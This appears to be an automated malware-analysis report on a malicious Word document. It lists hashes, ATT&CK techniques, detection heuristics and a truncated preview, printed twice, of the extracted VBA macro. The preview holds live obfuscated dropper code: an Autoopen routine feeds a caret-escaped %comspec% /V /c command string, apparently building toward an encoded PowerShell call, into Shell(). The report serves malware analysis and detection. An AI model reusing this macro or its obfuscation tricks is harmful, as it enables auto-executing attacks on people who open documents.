Office (OLE) malware analysis — malicious · d9dafbfdc72a9c2a

MALICIOUS

Office (OLE)

100.0 KB Created: 2018-06-06 22:09:00 Authoring application: Microsoft Office Word First seen: 2018-06-21

MD5: 83cc80ce024cb042cc9d3f509e256955 SHA-1: 41d47511c578be348493646028a134f0d4d98af9 SHA-256: d9dafbfdc72a9c2a3a7249878c95bf27608ab2ecb13ec5fab9a9daec34c424c5

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The Autoopen macro and a Shell() call within the VBA code indicate that the document is designed to execute arbitrary commands. The ClamAV detection 'Doc.Dropper.Agent-6575835-0' further supports that this is a dropper malware.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6575835-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6575835-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13304 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13304 bytes
SHA-256: `fe37a780be9644e6d97de5b037382f87e6059bc84c6b197647c6e9db19adc7b7`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "JkEQPihD" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function NOunDqfsJA() On Error Resume Next fuJLEt = CStr(lBiwT * Tan(czHOvX * Int(jZfOj * Sqr(59015) / cdQiF + Fix(47782)) / 31955 * Round(2043 / Log(39310 - KFzwNG) + 78876 - jGswNQ)) / 29721 + CByte(9212)) wFOufZ = CStr(kIlAs * Tan(QbdPEq * Int(GVTqQ * Sqr(92893) / idQAS + Fix(896)) / 55755 * Round(35159 / Log(90683 - zifdO) + 10570 - oFopR)) / 42085 + CByte(95612)) NOunDqfsJA = QIcFhYSqw + Shell(IZsERWSs + Chr(jnOXza + vbKeyC + mYzPqjz) + VDwCbH + tqwEiEHjK + wjwdpvTwjYS + jXQdKRGzsm + YcnwbtGZG + vaLkiKCOt, 1018 - 1018) Zhpcm = CStr(ijArG * Tan(khsSzj * Int(RZKus * Sqr(31151) / CKHiNI + Fix(36024)) / 78460 * Round(87883 / Log(37381 - pIhSvi) + 73636 - NjGMW)) / 85058 + CByte(71986)) End Function Sub Autoopen() On Error Resume Next flOmwM = CStr(VUbSiw * Tan(wnZiI * Int(pzifH * Sqr(70431) / Ovzkq + Fix(53171)) / 18113 * Round(74638 / Log(5917 - jqdTMw) + 38567 - IJonT)) / 76405 + CByte(85058)) NOunDqfsJA NJjHjf = CStr(JaaWq * Tan(ComtIs * Int(iEdAKS * Sqr(99635) / NacKsG + Fix(26886)) / 354 * Round(11538 / Log(91575 - BiTtlc) + 56595 - FUCuKv)) / 8430 + CByte(9954)) End Sub Attribute VB_Name = "jjzQflwz" Function VDwCbH() On Error Resume Next mRZjf = CStr(uEMzAO * Tan(XwMTia * Int(hRUWlT * Sqr(70512) / sJvdOK + Fix(32352)) / 50413 * Round(94142 / Log(95439 - EiaLW) + 99206 - OkDPW)) / 67382 + CByte(10046)) FrYWUzj = "md ZwmpJQbMjtq" + "JT zEttfW" + "juKE" + "zILlFOLQ" aVwDv = CStr(rILCE * Tan(zhGVP * Int(QVzHG * Sqr(96230) / RFAhc + Fix(75632)) / 23425 * Round(46205 / Log(83582 - vdtCGM) + 41697 - IScUh)) / 56593 + CByte(64881)) ujPZOHwnq = "r PQiz" + "LjDjbfA & " + " " + "%^c^o^m^" + "S^p" + "^E^c^% " + "%^c^o^m^S^p^E^" + "c^% " + " /V " ASjYS = CStr(wjdGr * Tan(iPszHw * Int(sWTKI * Sqr(56451) / zfuzXW + Fix(371)) / 55108 * Round(74959 / Log(88032 - SShiMZ) + 98767 - uftad)) / 23601 + CByte(70632)) MifXsziGAk = " /c " + " " + " set " + "%zEHBXFwz" pdjHa = CStr(ZQTmfj * Tan(aGcwK * Int(idOJuL * Sqr(76183) / NEFQln + Fix(8978)) / 21106 * Round(98390 / Log(12038 - OXtQLZ) + 88111 - ATZQc)) / 36425 + CByte(44854)) ZrmtMbKCfO = "HpCckJH%=aafft" + "bYi" + "o&&set" + " %Ncaas" + "Jirtvqd%=p&&se" + "t %zoHsCCVGF" obTmw = CStr(MLLOVu * Tan(PPGWMw * Int(lNDkA * Sqr(90059) / OnoczO + Fix(62535)) / 31455 * Round(68899 / Log(60874 - pbLhE) + 93641 - zUkDS)) / 89231 + CByte(30029)) oTKZPvUS = "YI%=o" + "^w&" + "&set %KwUmjB" + "SiECEDkiJ%" + "=SjnM" + "oznD&&set %iz" + "kCpaLTE%=!%" + "NcaasJirt" + "vqd%!&&set %T" VDwCbH = FrYWUzj + ujPZOHwnq + MifXsziGAk + ZrmtMbKCfO + oTKZPvUS End Function Function tqwEiEHjK() On Error Resume Next GVaYj = CStr(BAzYXl * Tan(fPzjb * Int(XVFDI * Sqr(12168) / AaBKUt + Fix(25696)) / 52634 * Round(15233 / Log(21250 - LwhnaN) + 18002 - LfTElX)) / 83503 + CByte(84692)) PKudZpjjPt = "cJwzGVf" + "ZMM" + "JiLb%=jzjHC" + "LprWTbsl&&se" + "t %QGfZhjcu%=e" + "^r&&s" + "et %fsDCGj" + "tBEJ%=!%zo" BARSRD = CStr(bwmDdY * Tan(YEKUfU * Int(urubvA * Sqr(63267) / QmdBU + Fix(50651)) / 14345 * Round(86834 / Log(44554 - swMcbG) + 7732 - jvAbDM)) / 45437 + CByte(16481)) OwbVUJ = "HsCCVG" + "FYI" + "%!&&set " + "%OmRSqjR" + "hafE%=s&&set " + "%VAMIQSDsWizhZ" + "iX%=zhHHzc" + "qRfB&&set %K" IXrWD = CStr(FizZb * Tan(WQLma * Int(XXRQnX * Sqr(14892) / lVojR + Fix(58143)) / 23841 * Round(38000 / Log(97970 - fXpsG) + 89477 - jckMfp)) / 78236 + CByte(56105)) vwIsFvzESDq = "amYdXV%" + "=he&&set %fHE" + "SSbCDRLO%=ll&&" + "!%izkCpaL" + "TE%!!%" + "fsDCGjtBEJ" + "%!!%QGfZhjcu" zkorjU = CStr(mTktQ * Tan(zqCRp * Int(DwfRX * Sqr(79896) / uXEFj + Fix(145)) / 11844 * Round(83068 / Log(58170 - fHlLID) + 48655 - BKYft)) / 19575 + CByte(26266)) ilWfiwizNkZ = "%!!%OmRSqjRhafE" + "%!!%KamYdXV%!" + "!%fHESSbCDRLO%!" + " -e K" hZdUTR = CStr(cZriN * Tan(tKRTP * Int(KEvvt * Sqr(11240) / WiiPdt + Fix(84 ... (truncated)

SHA-256: fe37a780be9644e6d97de5b037382f87e6059bc84c6b197647c6e9db19adc7b7

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "JkEQPihD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function NOunDqfsJA()
On Error Resume Next
fuJLEt = CStr(lBiwT * Tan(czHOvX * Int(jZfOj * Sqr(59015) / cdQiF + Fix(47782)) / 31955 * Round(2043 / Log(39310 - KFzwNG) + 78876 - jGswNQ)) / 29721 + CByte(9212))
wFOufZ = CStr(kIlAs * Tan(QbdPEq * Int(GVTqQ * Sqr(92893) / idQAS + Fix(896)) / 55755 * Round(35159 / Log(90683 - zifdO) + 10570 - oFopR)) / 42085 + CByte(95612))
NOunDqfsJA = QIcFhYSqw + Shell(IZsERWSs + Chr(jnOXza + vbKeyC + mYzPqjz) + VDwCbH + tqwEiEHjK + wjwdpvTwjYS + jXQdKRGzsm + YcnwbtGZG + vaLkiKCOt, 1018 - 1018)
Zhpcm = CStr(ijArG * Tan(khsSzj * Int(RZKus * Sqr(31151) / CKHiNI + Fix(36024)) / 78460 * Round(87883 / Log(37381 - pIhSvi) + 73636 - NjGMW)) / 85058 + CByte(71986))
End Function
Sub Autoopen()
On Error Resume Next
flOmwM = CStr(VUbSiw * Tan(wnZiI * Int(pzifH * Sqr(70431) / Ovzkq + Fix(53171)) / 18113 * Round(74638 / Log(5917 - jqdTMw) + 38567 - IJonT)) / 76405 + CByte(85058))
NOunDqfsJA
NJjHjf = CStr(JaaWq * Tan(ComtIs * Int(iEdAKS * Sqr(99635) / NacKsG + Fix(26886)) / 354 * Round(11538 / Log(91575 - BiTtlc) + 56595 - FUCuKv)) / 8430 + CByte(9954))
End Sub


Attribute VB_Name = "jjzQflwz"
Function VDwCbH()
On Error Resume Next
mRZjf = CStr(uEMzAO * Tan(XwMTia * Int(hRUWlT * Sqr(70512) / sJvdOK + Fix(32352)) / 50413 * Round(94142 / Log(95439 - EiaLW) + 99206 - OkDPW)) / 67382 + CByte(10046))
FrYWUzj = "md ZwmpJQbMjtq" + "JT zEttfW" + "juKE" + "zILlFOLQ"
aVwDv = CStr(rILCE * Tan(zhGVP * Int(QVzHG * Sqr(96230) / RFAhc + Fix(75632)) / 23425 * Round(46205 / Log(83582 - vdtCGM) + 41697 - IScUh)) / 56593 + CByte(64881))
ujPZOHwnq = "r PQiz" + "LjDjbfA &   " + "  " + "%^c^o^m^" + "S^p" + "^E^c^%     " + "%^c^o^m^S^p^E^" + "c^% " + "    /V    "
ASjYS = CStr(wjdGr * Tan(iPszHw * Int(sWTKI * Sqr(56451) / zfuzXW + Fix(371)) / 55108 * Round(74959 / Log(88032 - SShiMZ) + 98767 - uftad)) / 23601 + CByte(70632))
MifXsziGAk = "     /c " + "  " + "        set " + "%zEHBXFwz"
pdjHa = CStr(ZQTmfj * Tan(aGcwK * Int(idOJuL * Sqr(76183) / NEFQln + Fix(8978)) / 21106 * Round(98390 / Log(12038 - OXtQLZ) + 88111 - ATZQc)) / 36425 + CByte(44854))
ZrmtMbKCfO = "HpCckJH%=aafft" + "bYi" + "o&&set" + " %Ncaas" + "Jirtvqd%=p&&se" + "t %zoHsCCVGF"
obTmw = CStr(MLLOVu * Tan(PPGWMw * Int(lNDkA * Sqr(90059) / OnoczO + Fix(62535)) / 31455 * Round(68899 / Log(60874 - pbLhE) + 93641 - zUkDS)) / 89231 + CByte(30029))
oTKZPvUS = "YI%=o" + "^w&" + "&set %KwUmjB" + "SiECEDkiJ%" + "=SjnM" + "oznD&&set %iz" + "kCpaLTE%=!%" + "NcaasJirt" + "vqd%!&&set %T"
VDwCbH = FrYWUzj + ujPZOHwnq + MifXsziGAk + ZrmtMbKCfO + oTKZPvUS
End Function
Function tqwEiEHjK()
On Error Resume Next
GVaYj = CStr(BAzYXl * Tan(fPzjb * Int(XVFDI * Sqr(12168) / AaBKUt + Fix(25696)) / 52634 * Round(15233 / Log(21250 - LwhnaN) + 18002 - LfTElX)) / 83503 + CByte(84692))
PKudZpjjPt = "cJwzGVf" + "ZMM" + "JiLb%=jzjHC" + "LprWTbsl&&se" + "t %QGfZhjcu%=e" + "^r&&s" + "et %fsDCGj" + "tBEJ%=!%zo"
BARSRD = CStr(bwmDdY * Tan(YEKUfU * Int(urubvA * Sqr(63267) / QmdBU + Fix(50651)) / 14345 * Round(86834 / Log(44554 - swMcbG) + 7732 - jvAbDM)) / 45437 + CByte(16481))
OwbVUJ = "HsCCVG" + "FYI" + "%!&&set " + "%OmRSqjR" + "hafE%=s&&set " + "%VAMIQSDsWizhZ" + "iX%=zhHHzc" + "qRfB&&set %K"
IXrWD = CStr(FizZb * Tan(WQLma * Int(XXRQnX * Sqr(14892) / lVojR + Fix(58143)) / 23841 * Round(38000 / Log(97970 - fXpsG) + 89477 - jckMfp)) / 78236 + CByte(56105))
vwIsFvzESDq = "amYdXV%" + "=he&&set %fHE" + "SSbCDRLO%=ll&&" + "!%izkCpaL" + "TE%!!%" + "fsDCGjtBEJ" + "%!!%QGfZhjcu"
zkorjU = CStr(mTktQ * Tan(zqCRp * Int(DwfRX * Sqr(79896) / uXEFj + Fix(145)) / 11844 * Round(83068 / Log(58170 - fHlLID) + 48655 - BKYft)) / 19575 + CByte(26266))
ilWfiwizNkZ = "%!!%OmRSqjRhafE" + "%!!%KamYdXV%!" + "!%fHESSbCDRLO%!" + "  -e K"
hZdUTR = CStr(cZriN * Tan(tKRTP * Int(KEvvt * Sqr(11240) / WiiPdt + Fix(84
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.